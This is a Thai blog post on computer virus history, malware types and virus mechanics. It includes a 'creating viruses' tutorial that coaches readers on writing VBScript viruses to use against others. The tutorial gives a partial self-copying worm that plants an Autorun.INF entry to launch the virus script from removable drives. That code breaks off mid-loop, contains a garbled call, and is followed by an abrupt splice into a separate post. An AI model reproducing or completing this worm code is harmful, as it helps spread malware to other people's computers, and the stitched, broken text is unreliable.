ไวรัสคอมพิวเตอร์ไกล้ตัวกว่าที่คุณคิด ภาค 1

สวัสดีครับ...ห่างหายไปนาน...เอาล่ะ...มาเข้าเรื่องไวรัส ...วายร้ายดีกว่า...ทุกวันนี้หลายคนรู้...และเข้าใจกันดีว่า "ไวรัสคอมพิวเตอร์" ไม่ใช่ฝุ่นละอองที่ปนเปื้อนด้วยเชื้อไข้หวัดในคน...แต่มันคือ "โปรแกรมจำลองตัวเอง" แบบพิเศษที่สามารถติดเชื้อไปยัง "พาหะ" ที่เป็นสื่อเก็บข้อมูล...และผ่านทางเน็ตเวิร์ค...อย่างไรก็ตาม...เราทุกคน ต้องทนอยู่กับเจ้าสิ่งแปลกปลอมนี้ไปอีกนาน...



กำเนิดของไวรัสพอสังเขป...เริ่มจาก

1." จอนวอน นิวแมน"ตั้งทฤษฏีว่า"โปรแกรมคอมพิวเตอร์สามารถจำลองตัวมันเองได้"ในหนังสือ ที่เขาประพันธ์(ตอนนั้นยังไม่มีคอมพิวเตอร์PCที่เราใช้กันอยู่ด้วยซ้ำ)และ เขาก็คิดถูก...เพราะหลังจากนั้นไม่นาน

2.ศูนย์วิจัย "เบลแลป"ทำการทดสอบโปรแกรมที่มีชื่อว่า"สงครามหน่วยความจำ"โดยให้ โปรแกรมเมอร์ในทีมวิจัย...สร้าง"โปรแกรมที่สามารถจำลองตัวเองเพื่อแย่งชิง หน่วยความจำในเครื่องเมนเฟรม"ผลปรากฎคือ...เกิดโปรแกรมจำพวกไวรัส...ตัวแรก บนโลก...ในห้องทดลอง...โดยที่กระทรวงกลาโหมของสหรัฐอเมริกา...ได้รับรายงาน แต่ก็คิดว่ามันไม่มีอันตรายใดๆต่อเครื่องของพวกเขา...

3.หลังจากนั้น ไม่นาน...ก็มีไวรัสแพร่ระบาดในเครือข่าย่ของสหรัฐอเมริกา...จนเป็นสาเหตุ... ให้ทุกฝ่ายหันมาให้ความสนใจเรื่องไวรัสคอมพิวเตอร์...

4.ต่อมา"เฟรด โคเฮน"ก็เป็นคนแรก...ที่ตั้งคำจำกัดความให้กับโปรแกรมจำพวกนี้ว่า"ไวรัส คอมพิวเตอร์"พร้อมกับทำไวรัสออกมาเพื่อสาธิตให้กับคนทั่วๆ ไปได้ทราบว่ามันคืออะไรเขาถึงได้สมญาว่าเป็น "บิดาแห่งไวรัสคอมพิวเตอร์" ไวรัสยังคงมีอย่างต่อเนื่อง...

5.ในยุคที่PCถือกำเนิดก็มีไวรัสตัว แรกที่ติดเชื้อบนเครื่อง PC คือ "ซีเบรน" ซึ่งเขียนโดยสองพี่น้องชาวปากีสทาน (ขอไม่เอ่ยนาม...เพราะไม่ใช่วีรบุรุษ) ซึ่งเขียนไวรัสบูตเซกเตอร์ติดเชื้อไปกับแผ่น "บูตดอส"ของดอส 3.1รุ่นโบราณ...ใครก็ตามที่นำแผ่นโปรแกรมละเมิดลิขสิทธิ์ที่สองพี่น้องผู้ นี้ขายให้...ติดไวรัสกับบ้านไปทุกคน...

6.ต่อมาเกิดไวรัสติดแฟ้ม .COM, .EXE ที่ชื่อ "เจรูซาเลม" ถือเป็นไวรัสติดแฟ้มข้อมูลจำพวกแรกที่กำเนิดขึ้นบนโลก...คนเขียนเหรอ...ไม่ มีใครทราบตัวตนที่แท้จริง...รู้อย่างเดียวว่ามันระบาดในโรงเรียนแห่งหนึ่งใน "เยรูซาเลม" เป็นที่แรก

(ไวรัส "ลาวดวงเดือน" ซึ่งเป็นไวรัสบูตเซกเตอร์และเป็นไวรัสตัวแรกของประเทศไทย...ทุกวันนี้ก็ยังไม่มีใครทราบว่าคนเขียนเป็นใคร...)



นิยามที่ทำให้จำแนกมัลแวร์ออกมาได้ดังนี้

1.ไวรัสคอมพิวเตอร์"โปรแกรมจำลองตัวเองไปยังแฟ้มต่างๆได้ (จำกัดความจากแฟ้มคอมพิวเตอร์)"

2.หนอนคอมพิวเตอร์"โปรแกรมจำลองตัวเองไปยังเครื่อข่ายและเครื่องต่อเครื่อง(จำกัดความจากพาหะติดเชื่อ)"

3.ม้าโทรจัน"โปรแกรมทำลายเมื่อเปิดหรือเสียบอุปกรณ์สื่อสาร"

4.แอดแวร์"โปรแกรมเพิ่มหน้าเวปหรือโฆษณาที่ไม่ต้องการในเครื่องคอมฯ"

5.สปายแวร์"โปรแกรมดักจับรหัส...ดักจับข้อมูล...หรือฝั่งตัวเองเพื่อสืบความลับ"

6.โฮแอกซ์"โปรแกรมปลอมๆสนุกๆล้อกันเล่นว่าคือไวรัส...เป็นจดหมายลูกโซ่"



รูปแบบการทำงานของไวรัส...

1. ถ้าเริ่มบูตเครื่อง...ไวรัสสามารถครอบครองหน่วยความจำ...Viture Memory ได้...ก่อนโปรแกรมฆ่าไวรัส...ไวรัสจะชนะทันที (บูตเซกเตอร์ และ พาทิชั่นไวรัส)

2. ถ้ายังไม่ได้...จะเริ่มแทรกซึมเช้าสู้แฟ้มระบบของวินโดวส์...เพื่อย้ายการ ค้นหาไวรัสไปยังแฟ้มที่ไวรัสหลอกเอาไว้...ถ้าทำได้...ไวรัสก็จะชนะอีก (ไวรัสฝั่งตัวในหน่วยความจำ หรือ สเตร์ทไวรัส "ไอ้เครื่องบินรบ")

3. ถ้ายังไม่ได้...จะฝั่งตัวเข้าระบบฐานข้อมูลวินโดวส์เช่นแฟ้ม service .ini, .inf, และ Registry เพื่อไม่ให้ โปรแกรมฆ่าไวรัสมาฆ่ามันได้...ถึงแม้ตรวจเจอก็ตาม (ไวรัสสคริปวินโดวส์...หรือซิสเต็มไวรัส)

4. ถ้ายังไม่สำเร็จ..."รีโทล ไวรัส" จะทำการลบโปรแกรมฆ่าไวรัสทิ้งซะ...ตอนนี้ต้องแข่งขันกันเชิงกลยุทธ์ ระหว่าง "เทพกับมาร" ใครแพ้ต้องตาย...!

5. ถ้ายังไม่สำเร็จ...จะเปลี่ยนหน้าตาตัวเอง...ไม่ให้ซ่ำกัน..."โพลีมอฟิก ไวรัส" จะแพร่ตัวเองอย่างรวดเร็วโดยเป็น "จอมโจรพันหน้า" ถึง...ตำรวจอย่างโปรแกรมฆ่าไวรัสจะเจอ...ก็ฆ่าได้บางตัวที่จำหน้ามันได้... แต่ฆ่าไม่ได้ทุกตัวเพราะ...มันเปลี่ยนหน้าตาไปทุกครั้งที่แพร่เชื้อ

6. ถ้ายังไม่สำเร็จ...ก็จะติดต่อ...สื่อสาร...กับจอมมารในเน็ตเวิร์ค(ผู้เขียน ไวรัส)...เพื่อดาวน์โหลดโปรแกรมไวรัสรุ่นใหม่ๆ ลงมา...ต่อสู้กับโปรแกรมฆ่าไวรัส (อินเตอร์เน็ตไวรัส...หรือ มัลแวร์แบ็กดอร์ "พวกชอบประตูหลัง")

7. ถ้ายังสู่โปรแกรมฆ่าไวรัสไม่ได้อีก...ไม่รู้จะเขียนอะไรดี...ปล่อยจดหมาย ลูกโซ่แกล้งคนอื่นๆ ดีก่า...ว่ามันเป็นไวรัส...ถ้าไม่ส่งต่อ...ติดเชื้อถึงตาย..."โฮแอกซ์ หรือ ไวรัสตลก..."

8. โอยยังมี "มัลติแพล็ตฟอร์มไวรัส...มัลติโอเอสไวรัส...รันไทม์ไวรัสอีก...ที่ยังไม่ กล่าวถึง..."ผมถามจริงๆ เหอะ...เขียนขึ้นมาเคยได้สตังค์กันบ้างใหม?"



เรื่องยุทธการทางการทหารของไวรัสคอมพิวเตอร์....

คุณ... ๆ เคยรู้ไหมว่า...สงครามอิเล็กทริก มันมีจริง...และไม่ใช่แค่นิยายด้านวิทยาศาสตร์ แบบเรื่อง ID4 แต่ความจริงแล้ว...ไวรัสคอมพิวเตอร์นั้นสามารถนำมาทำเป็นยุทธโทปกรณ์ด้าน อิเล็กทรอนิกส์ กันจริงๆ ...ถ้าอยากรู้ก็รอดูสงครามโลกครั้งที่ 3 (ไม่รู้มันจะเกิดจริงหรือเปล่า) ผมอาจจะไม่มีข้อมูลหรือหลักฐานที่มากไปกว่า...การทดลองและคำพูดที่เลือนลอย ...แต่คุณก็จินตนาการตามแล้วกันว่า...จะใช้ไวรัสคอมพิวเตอร์ทำอะไรบ้างใน สนามรบ....

1. ช่วงชิงการทำลายฐานข้อมูลข้าศึก... "ก่อนที่จะทำการโจมตีข้าศึกในแนวรบนักการทหารจะต้องใช้กลยุทธทุกๆ อย่างในการทำลายส่วนควบคุมบัญชาการรบของแนวข้าศึกเพื่อลดทอนประสิทธิภาพใน การรบออกไป...เช่น ปล่อยไวรัสคอมพิวเตอร์ไปยังสัญญาณ ไวเลช...บูททูสน์...หรือ อินเตอร์เน็ต...ก่อนออกแถลงการโจมตี และส่งเครื่องบินไร้คนขับ...ปล่อยสัญญาณความถี่ชนิดพิเศษ(ไม่ทราบชื่อของมัน แต่มีอยู่จริง) เพื่อเชื่อมโปรเซส ของ CPU PC คอมพิวเตอร์ให้เป็น Asmbly Code ที่ต้องการ...และช่วงชิงการทำลายข้อมูล เข้ารหัส...และ

ฝั่ง Back Door เอาไว้เพื่อล้วงความลับของคอมพิวเตอร์ส่วนบุคคลแดนข้าศึก"

2. ทำลายการสื่อสาร...ดาวเทียม...และการบัญชาการ..."เมื่อประกาศการรุกราน นักการทหารข้าศึกจะสั่งการตอบโต้...แต่ถ้าถูกตัดสัญญาณการบัญชาการรบหัวรบ ขีปนาวุธ...เครื่องบินรบ...กองเรือยุทธการ...รวมถึงกำลังภาคพื้นดิน...ไวรัส จะมีหน้าที่ในการก่อกวนการสื่อสาร...บางครั้งแทรกซึม...แพร่กระจายตัวยัง เครือข่าย...ทั้งเครื่อง "เมนเฟรม", "ซุปเปอร์คอมพิวเตอร์" โดยให้มันทำงานเกินอัตตราหรือ เข้ารหัสสัญญาณเก็บข้อมูล...รวมทั้งปล่อยข่าวล่วงด้านการศึก...หากสำเร็จ เพียง 1 เครื่อง ใน 10 เครื่องก็ถือว่า ชนะในสงครามด้าน อิเล็กทริก"

3. สืบค้นข้อมูลสำคัญ...และส่งข้อมูลที่จำเป็นกับสู่แนวรบ..."เมื่อทำศึกแล้ว สิ่งที่สำคัญที่สุดในยุทธปัจจัย...คือ การข่าว...ไวรัสคอมพิวเตอร์จะส่งข้อมูลด้านสารสนเทศออกจากฐานข้าศึกในทุก รูปแบบ...ทุกชั่วโมงและวินาที...ไม่ว่าจะเป็นรายชื่อทหารเสนาธิการ...กอง กำลังแนวหน้า...หรือแผนที่ทางการทหาร...อาวุทยุทโธปกรณ์ที่ใช้ทำส่งคราม... ไม่ว่าข้อมูลในส่วนใดก็ตามถ้าเล็ดลอดออกไปได้...จะเกิดผลเสียต่อข้าศึกอย่าง มาก"

4. ควบคุม...ทำลาย...เทคโอเวอร์..."คำสั่งนี้...จะเป็นคำสั่งสุดท้ายของไวรัส ...คือมือถูกจับตัว...หรือถูกค้นพบ...จะทำลายตัวเอง...เพื่อไม่ให้ถอดรหัสคำ สั่งหรือ...ถูกขวางการทำงานด้านอิเล็กทริก...จะส่งคำสั่งพิเศษทำลายอุปกรณ์ ด้าน ฮาร์ดแวร์ (ทำได้ในภาพทฤษฎีและเคยทำสำเร็จในห้องทดลอง) เพื่อถ่วงเวลาการกู้ข้อมูลและการสืบค้นไวรัส...รวมถึงทำลายฐานข้อมูลทุก รูปแบบ..ไม่ว่าจะเป็นรายชื่อสำมะโนครัว...โปรแกรมพื้นฐานต่างๆ ...ข้อมูลเข้ารหัสต่างๆ...โดยไม่สนใจว่าสำคัญหรือไม่...ด้วยวิธีการพิเศษที่ ไม่สามารถทำการกู้ข้อมูลได้ ไม่ว่าจะเป็น

การเขียนทับ...Empty Folder หรือ สร้างม้าโทรจัน...เชื่อมต่ออุปกรณ์ต่อเติม...ลอจิกบอมส์แบบ รันไทม์ ถึงแม้คำสั่งเหล่านี้จะเป็นคำสั่งพื้นฐาน...แต่มันมีผลมากต่อผู้ใช้ เทคโนโลยีสารสนเทศ เหมือนกับ...สายระเบิดที่นักกู้ระเบิดรู้อยู่แล้วว่าต่อสลับวงจร...แต่ก็ กดดันจิตวิทยา...และสร้างความสับสนให้ผู้กู้ข้อมูลพอสมควร

5. ท้ายที่สุด...."มีไวรัส...เหมือนไม่มีไวรัส" หมายถึง..."ไม่ว่าสงครามจะออกมาในรูปแบบใด...ไวรัสคอมพิวเตอร์จะต้องฝั่งตัว อยู่ต่อไป...แม้ว่าถูกจับได้...หรือประเทศรุกรานพ่ายแพ่...แต่ไวรัส คอมพิวเตอร์เหล่านั้นจะต้องฝั่งตัวอย่างเงียบ..ๆ เสมือนว่าไม่เคยเกิดอะไรขึ้น...และรอค่อยการเรียกใช้งานอีกครั้ง...ผ่าน BackDoor ("ประตูหลัง...ทางสู่นรก")" คุณๆ ยังไม่รู้หลอกครับว่า...เขียนไวรัสขึ้นมา 1 ตัว...ต้องใช้ประสบการณ์และจินตนาการขนาดไหน...ไม่ต้องสงสัย...หรือเชื่อใน สิ่งที่ผมเล่ามาหลอกครับ...เพียงคุณลองจินตนาการดูซิว่า "มิจฉาชีพทุกคนเขียนไวรัสเป็นโลกจะวุ่นวายขนาดไหน" และถ้าคำพูดแค่ "คัดลอกฉันไปยังทุกๆ เครื่องบนโลกใบนี้" มันสามารถทำได้จริง...จะเกิดอะไรขึ้น...ในโลกของคุณ....



การสร้างไวรัส

1. การสร้างไวรัส...นั้นไม่ต้องมากครับ...ผู้เขียนไม่จำเป็นต้องเรียนเก่งระดับ ปริญญาเอก...หรือโท...แต่คุณมีความสามารถด้านภาษาอังกฤษแบบงูๆ ปลาๆ เต่าๆ ก็ได้...

2. เร่งเห็นความสำคัญของการศึกษาไวรัส...เพื่อ...ป้องกันตัวเองครับ...แรกๆ คุณอาจคึกคะนองอยากเห็นผลงานชิ้นโบว์แดงแพร่ระบาด...ขอบอกเลยนะ...ยากครับ ...เพราะคุณต้องมีทักษะระดับเซียนเพื่อฆ่าไวรัสคู่แข่งด้วย...เหมือนการวิ่ง เข้าเส้นชัยเพื่อกลับไปเกิดอีกครั้งเลย...เพราะต่างค้นต่างต้องการแย่งชิง Autorun.INF

3. ถ้าคุณเขียนไวรัสขึ้นมาแล้ว...ย่ำอย่างมาก...อย่านำคำสั่ง Bomb ติดไปกับไวรัสนะ...เพราะมันสร้างความเดือดร้อนให้กับผู้ติดเชื่ออย่างมาก อย่าง KillVBS แรกๆ ผู้เขียนไวรัส...ตั้งใจจะให้มันฆ่าไวรัส .VBS ตัวอื่น...แต่หลังๆ เริ่มนำปัญหามาสู่ระบบของผู้อื่นอย่างชัดเจน...

4. เริ่มเลย...ถ้าไม่มีอคติ...กับผู้ที่เรียกตัวเองว่า "เวิร์มเมอร์" ทั้งหลาย...(แต่ถ้าคุณเรียกตัวเองว่า "แฮกเกอร์" ไม่อายเหรอที่ยังไม่มีพื้นฐานด้านความปลอดภัยระบบเพียงพอ...หรือไม่ใช่ คุณเป็น "แครกเกอร์" ก็เช่นกันเก่งแต่เจาะระบบชาวบ้าน...แต่เครื่องตัวเองเต็มไปด้วยเชื้อโรคผู้ อื่น และฆ่ามันไม่เป็น)

5. กลยุทธ์พื้นฐานคือ ภาษา VBScript มันคือคำสั่งที่ต้องพึ่งพา WScript.EXE ฉนั้นท่าไม้ตายที่ดีที่สุดในการกำจัดไวรัสพวกนี้คือ...ลบมันทิ้ง...หรือ เปลี่ยนชื่อมันเป็นอย่างอื่นซะ...

6. แน่นอนแหละไม่มีใครใช้ .VBS เล่นงานคุณได้..แต่ถ้าจะเล่นงานคนอื่นล่ะนำมันกลับมาก่อน...เขียนคำสั่งลงไป ...ไม่มีสูตรตายตัวครับ...สำหรับการสร้างไวรัส .VBS แต่ที่สำคัญ...คือ...คุณคิดว่า...เด็กที่กำลังคลานตามคุณมาจะเก่งกว่าหรือ แกล้งคุณได้สบายๆ หรือเปล่า...(มันก็เหมือนพ่อมดรุ่นใหม่ๆ...กำลังจะแซงแฮรี่พอร์ตเตอร์อย่าง พวกคุณ)

7. พล่าม...เยอะ...แต่...ต้องเริ่มสอนแฮรี่พอร์ตเตอร์ร่ายคาถากันก่อน...

7.1 ใน Notepad จะเป็นตัวเขียนไวรัสชั้นดี...ยิ่งใน Notdpad++ สามารถบอกโครงสร้าง .VBS ได้เป็นอย่างดี...แต่มันไม่สำคัญเท่ากับการต้องรู้เงื่อนไขกติกาการเขียนซะ ก่อน

7.2 ภาษา VBScript เป็นภาษาที่ต้องอาศัยความชำนาญทางด้าน ฟังก์ชั่นของระบบปฏิบัติการเช่น สามารถสร้าง Shot Cut เพื่อหลอกผู้อื่นได้...(ตัวอย่างมันอยู่ใน Win Me ทุกเครื่อง) หรือ สามารถติดต่อกับ Excel เพื่อสร้างไวรัสที่ติดเชื้อ Excel ได้ด้วย...(ตัวอย่างอยู่ใน Win Me เช่นกัน) มันสามารถทำให้ระบบRegistry ไม่สามารถ Load โปรแกรมฆ่าไวรัสได้ด้วย

หรือแม้กระทั่ง...ดักแป้น พิมพ์ทุกแป้นที่ผู้ใช้เครื่องคนนั้นใช้เป็นรหัสผ่านในการเล่นเกมส์เช่น... เกมส์ออนไลน์ต่างๆ ได้...(อู้...อู้...ขี้โม้ล่ะมั่ง...เปล่าหลอกไอ้น้อง...มันมีจริง...แต่ ต้องศึกษากัน)

7.3 เมื่อสร้างความทะยานอยากให้พวกคุณแล้ว...ความชั่วในตัวเริ่มสูบฉีด...แต่ยัง ไม่พอ...คุณต้องมีสติพอที่จะรู้ว่า...ไม่ง่ายนะ...ถ้าคุณคิดแบบเด็กๆ ที่กำลังอยากจะเอาชนะ...เพราะก่อนอื่น...ภาษา VBS นั้นเขียนง่ายมาก...ถ้ามีเครื่องมือแบบ "วิชวล" คือ "มันจะบอกถึงกิ่งก้านสาขาของคำสั่งที่คุณเขียน...และข้อผิดพลาดมีน้อยมาก" แต่ "ของฟรีไม่มีในโลก" ผมเองยังหามาใช้ไม่ได้เหมือนกันฮุๆๆๆ เลยสอนแบบ ไทยๆ เรานี้แหละ... NotePad เจ้าเก่าเรา...ผิดก็รันไม่ได้แค่นันเอง...

8. ภาษา VBScrip ต้องการคำสั่งเชื่อมต่อเพื่อบ่งบอก Object ที่จะเรียกใช้เช่น



CreateObject("WScript.Shell").Run "คำสั่ง DOS"



คือ เรียก WScript เพื่อทำงานด้วยคำสั่งDOS (Shell "หอย" นี้แหละที่ติดต่อกับคาถาระดับสูง DOS) Object คือ Wscript.Shell คำสั่งเชื่อมต่อมาคือ .Run หรือเราจะเขียนอย่างนี้ก็ได้



Set DosCmd = CreateObject("WScript.Shell")

DosCmd.Run "คำสั่งดอส"



คือ กำหนดตัวแปร DosCmd เพื่อเก็บคำสั่ง CreateObject("Wscript.Shell') ที่แสนจะยาวยืด ตามด้วยคำสั่งเชื่อมต่อก็ได้



' ส่วนนี้ถ้านำหน้าด้วย ' จะเป็นคอมเมนต์เพื่อบอกความหมายของคำสั่งหรือ

' เราจะใช้บอกอะไร ...ถึงผู้ติดเชื้อไวรัสของเราก็ได้

' ใส่ข้อความบอกให้ผู้ติดเชื้อทราบเมื่อเปิดอ่าน...ได้เลย

on error resume next

' ผิดพลาดอะไรข้ามไป 1 ที

dim AutoRun, Code, IsDrive, Virus, SysFile, Data, MyFile

' ประกาศตัวแปรที่ใช้ในโปรแกรม (ต้องประกาศให้ครบถึงทำงานบน .VBS ได้)

AutoRun="[autorun]" & vbNewLine &"shellexecute=wscript.exe ไวรัสฉันเอง.vbs"

' ให้ตัวแปร AutoRun เป็นคำสั่งใน Autorun.INF

set SysFile=createobject("Scripting.FileSystemObject")

' กำหนดตัวแปร SysFile เป็นคำสังของ System File Object

set Virus=SysFile.getfile(Wscript.ScriptFullname)

' กำหนดให้ Virus เป็นชื่อของสคริปที่รัน

set Data=Virusastextstream(1,-2)

' กำหนกให้ Data เป็นข้อความในไวรัส

do while not Data.atendofstream

' ทำจนกว่าข้อความในไวรัสถูกก็อปหมด

Code=Code & Data.readline & vbnewline

' Codeคือข้อความที่ทุกบรรทัด

loop

'วนการทำงานจนจบปัญหาไวรัส...เรื่องราวที่

เอา ล่ะ...ทิ้งเรื่องไวรัสมานาน...มาพูดกันหน่อยก่อนสิ้นปี...ผมเป็นคนหนึ่งที่ เข้ากระทู้พันทิป...เพื่อศึกษาการทำงานของโปรแกรมและเขียนโปรแกรม...เป็น หลักส่วนตอบกระทู้เพื่อสอนวิธีฆ่าไวรัสนั้น...ไม่ใช่งานเลยครับ...เพราะบาง คนก็ยังมีความคิดแบบเดิมๆ คือ DOS เป็นอะไรที่ต้องห้าม...หรือเป็นคำสั่งยุคโบราณที่คนสมัยใหม่...เห็นว่าเชย ...และไม่ค่อยมีใครรู้จริง...นอกจาก..."ขาแฮก" หรือ"ขาแครก" กัน...ที่คนพวกนั้นไว้เจาะระบบกันจริงจัง...พบเป็นคนหนึ่งครับ...ที่พูดกัน จริงๆ เลยว่าฝีมือเรื่อง DOS ยังไม่ถึงขั้น...ไม่ใช่ถล่มตัวนะครับ...แต่ยังต้องอาศัย Blog แห่งนี้โพสต์ความรู้เก็บเอาไว้เตือนความจำเหมือนกัน...เอาล่ะ...เข้าเรื่อง ไวรัส...



ประเภทของไวรัส(แบ่งตามระดับการทำงานและภาษาทีใช้งาน)

1. ไวรัสบูตเซกเตอร์ (Boot Sector or Boot Infector Viruses)

ปกติ โดยทั่วไปแล้ว...ฮาร์ดดิสก์ทุกๆ ตัวจะมี บูตเซกเตอร์อยู่แล้ว ซึ่งเป็นตำแหน่งที่อุปกรณ์ใช้อ้างอิงเพื่อให้รู้ว่าเป็นตำแหน่งเริ่มต้นของ การอ่านและเขียนข้อมูลเพื่อใช้เป็นหลักการอ้างอิงข้อมูลกับซอฟต์แวร์ ในส่วนของรายละเอียดเกี่ยวกับ หลักการทำงานผมไม่ขออธิบายอะไรมาก แต่จะอธิบายสั้นว่า "เอ็มบีอาร์; MBR หรือ Master Boot Record" จะเป็นส่วนที่สำคัญที่สุดของอุปกรณ์ประเภทนี้ หากส่วนนี้เสียหายจะทำให้ฮาร์ดดิสก์ทั่งลูกไม่สามารถทำงานได้เลย ซึ่ง "เอ็มบีอาร์" ของฮาร์ดดิสก์มีขนาด 512 ไบต์ หรือ ห้าร้อยสิบสองตัวอักษร ซึ่งเป็นขนาดมาตราฐานของเอ็มบีอาร์ และบางที อาจจะมีขนาดใหญ่กว่านั้นมาก ในระบบปฏิบัติการ Linux อย่างไรก็ดี "เอ็มบีอาร์" จะถูกระบุขนาดของดิสก์ขั้นพื้นฐาน รวมถึง ซีเรียลนัมเบอร์ของฮาร์ดดิกส์ลูกนั้น และประกอบไปด้วยคำสั่งของ BIOS ในขั้นพื้นฐานเพื่อเชื่อมต่อกับระบบปฏิบัติการในขั้นตอนการบูตอัปต่อไป จากนั้นภายในตัวระบบปฏิบัติการก่อจะสร้าง "ดีบีอาร์ ; DBR หรือ DOS Boot Record และ ตารางพาร์ทิชั่น" ซึ่งเป็นตำแหน่งทางตรรกะ กล่าวคือ เป็นตำแหน่งที่ทำหน้าที่จำลองอุปกรณ์ออกเป็นไดร์ฟข้อมูลทางตรรกะขึ้นเพื่อ ความสะดวกของการติดต่ออุปกรณ์นั้นๆ เช่น ไดร์ฟ C: และ D: เพื่อให้ฮาร์ดดิสก์หนึ่งตัวสามารถมีระบบปฏิบัติการที่มากกว่า 1 ระบบ ได้ ใน "ดีบีอาร์" นี้ก็มีลักษณะเหมือนๆ กับ "เอ็มบีอาร์" เพียงแต่ ขนาดของฮาร์ดดิกส์จะถูกระบุเป็นขนาดของไดร์ฟ และขนาดของเซ็คเตอร์จะถูกระบุเป็นขนาดของคลัสเตอร์ต่อ FAT ซึ่งจะบ่งบอกว่าขนาด FAT เป็นเท่าใด โดยทั่วไป แล้วไวรัสมักจะไม่สามารถเข้ามาติดในส่วน "ดีบีอาร์" ได้ แต่ไวรัสบางตัวมีความสามารถในการดักจับและตรวจสอบตำแหน่งจึงสามารถติดเชื้อ ใน "เอ็มบีอาร์" และ "ดีบีอาร์ (ที่บางคนเรียกว่า ตารางพาร์ชั่น)" โดยปกติไวรัสบูตเซกเตอร์ในยุคแรกๆ จะติดเชื้อใน "เอ็มบีอาร์" ต่อมาก็ถูกเขียนและพัฒนาให้ติดเชื้อใน "ดีบีอาร์" ได้ด้วย จึงทำให้คำสั่ง FDISK /MBR ไม่สามรถฆ่ามันได้ทุกตัวเสียแล้ว จึงต้องอาศัยความเชี่ยวชาญอย่างมากในการฆ่าไวรัสประเภทนี้...บางครั้งจะพบ ว่าบางคนบอกว่าไวรัส " บูตเซกเตอร์ฆ่าง่ายๆ ทั่งๆ ที่จริงแล้วไวรัสจำพวกนี้ส่วนใหญ่ ฆ่ามันง่ายๆ ก็จริงแต่พวกไวรัส DieHard และ Stone นั้น...(ติดเชื้อใน DBR และตารางพาร์ทิชั่นได้ด้วย) ต้องพึ่งพาโปรแกรมฆ่าไวรัสอย่างเดียว...ถ้าเป็นสมัยนี้ ไวรัสจำพวกนี้ถูกเขียนขึ้นมาชนิดใหม่อาจทำให้ช่างซ่อมคอมพิวเตอร์บางคนเคลม สินค้าหนีความจริงกันทีเดียว



2. โปรแกรมไวรัสหรือไวรัสแฟ้มคำสั่ง (Program or File Infector Viruses)

โปรแกรม ไวรัสนั้น เป็นไวรัสรุ่นเก่าๆ ที่ผู้สร้างโปรแกรมไวรัสนั้นต้องมีทักษะความสามารถใน "ภาษา Asembly" พอสมควร หรือใช้ "ภาษา C" เพื่อเขียนโปรแกรมไวรัสขึ้นมา ไวรัสจำพวกนี้เน้นการทำงานร่วมกับหน่วยความจำเป็นหลัก ตัวคำสั่งของไวรัสเองจะแตกออกเป็นชิ้นๆ เพื่อกระจายตัวอยู่แฟ้ม .COM หรือ .EXE จึงทำให้การกำจัดไวรัสพวกนี้ทำได้ยากมาก ต้องอาศัยคำสั่งในโปรแกรมฆ่าไวรัสเท่านั้นถึงจะทำลายไวรัสจำพวกนี้โดยที่ แฟ้มติดเชื้อจะไม่เสียหายเลย ไวรัสจำพวกนี้ก็มีหลักการทำงานทุกรูปแบบ ที่อธิบายไว้ตอนต้น ถึงอย่างไรในปัจจุบันไวรัสจำพวกนี้พบในเครื่องคอมพิวเตอร์ส่วนบุคคลน้อยมาก ในยุคระบบปฏิบัติการวินโดวส์ เพราะชุดคำสั่งควบคุมในวินโดวส์ไม่เอื้อต่อการแพร่เชื้อเหมือนสมัยที่เป็น DOS อยู่นั้นเอง



มาดูรูปแบบจำลองคำสั่งไวรัสแบบเขียนทับ

1. [1. IAmVirus] คือคำสั่งของไวรัส

2. [1. ผมคือโปรแกรมครับ] มันคือคำสั่งโปรแกรมของพวกคุณ

3. เมื่อคำสั่งไวรัสแบบเขียนทับ...ทำงาน มันจะทำให้โปรแกรมของพวกคุณเป็นเช่นนี้ [1. IAmVirusแกรมครับ] คำสั่งไวรัสจะทับคำสั่งเดิมของโปรแกรมเป็นผลทำให้โปรแกรมเสียหายในทันที

4. เมื่อมันต้องการติดเชื้อแฟ้มอื่นด้วย เช่น จะติดเชื้อใน [1. ข้า][2. คือ][3. แฟ้ม][4. ระบบ]

5. มันก็จะเขียน [1. IAmVirus][2. คือ][3. แฟ้ม][4. ระบบ] ทับแฟ้มระบบที่มีขนาดเล็กกว่ามันเสียหายจนทำให้ระบบทำงานผิดพลาดไป

...เป็นสาเหตุให้ไวรัสชนิดนี้ทำงานไม่ประสบความสำเร็จ



มาดูรูปแบบจำลองคำสั่งไวรัสแบบเขียนต่อเติม...

1. [1. I][2. AmVirus] คือคำสั่งของไวรัส

2. [1. ผมคือโปรแกรมครับ] มันคือคำสั่งโปรแกรมของพวกคุณ

3. เมื่อคำสั่งไวรัสแบบเขียนต่อเติมทำงาน มันจะทำให้โปรแกรมของพวกคุณเป็นเช่นนี้ [1. I][3. คือโปรแกรมครับ][2. AmVirusผม]

4. เมื่อมันต้องการติดเชื้อแฟ้มอื่นด้วย เช่น จะติดเชื้อใน [1. ข้า][2. คือ][3. แฟ้ม][4. ระบบ]

5. มันก็จะแตกตัวจาก [1. I][3. คือโปรแกรมครับ][2. AmVirusผม] เป็น [1. I][2. AmVirus] เช่นเดิม

6. จึงแพร่เชื้อเข้าสู่ [1. I][3. คือ][4. แฟ้ม][5. ระบบ][2. AmVirusข้า]

...มันจึงประสบความสำเร็จอย่างมากในการแพร่เชื้อในสมัยก่อน...





3. สคริปไวรัส (Scripts Viruses)

ไวรัส ชนิดนี้ โดยทั่วๆ ไปจะพบเป็นหนอนคอมพิวเตอร์เสียส่วนใหญ่ในปัจจุบัน คือการอาศัยแฟ้ม Autorun.INF เพื่อเรียกพวกมันทำงานเมื่อเสียบอุปกรณ์เก็บข้อมูลแบบ Removable นั้นเอง การทำงานของไวรัสสคริปหรือหนอนจำพวกสคริป จะอาศัยประโยชน์จากคำสั่งของระบบปฏิบัติการเป็นคำสั่งอำนวยการแพร่เชื้อ ไวรัส แม่แต่ “เวปเพจ” เองก็พบไวรัสจำพวกนี้เหมือนกัน เพราะแฟ้ม .HTM หรือ .HTML จะอาศัยภาษา “วิชวลเบสิคสคริป” และ “จาวาสคริป” เป็นคำสั่งเสริมการทำงานเพื่อให้เวปเพจสามารถทำงานที่สลับซับซ้อนได้ ซึ่งในชุดคำสั่งเหล่านั้นเป็นเพียง “Text และ ข้อความธรรมดา” จึงทำให้คำสั่งที่เป็นข้อความถูกเคลื่อนย้ายและจำลองชุดข้อความนั้นไปยัง แฟ้มอื่นๆ ได้ ไม่แปลกเลยที่เวปไซด์เอง จะเป็นช่องทางในการแพร่ไวรัสช่องทางหนึ่งที่มีความสกปรกอย่างมาก แต่ระบบปฏบัติการ Windows XP นั้นไปทำการอุดช่องว่างเหล่านั้นโดยการเพิ่มความปลอดภัยที่เรียกว่า “Fire Wall ; ไฟล์วอลล์” 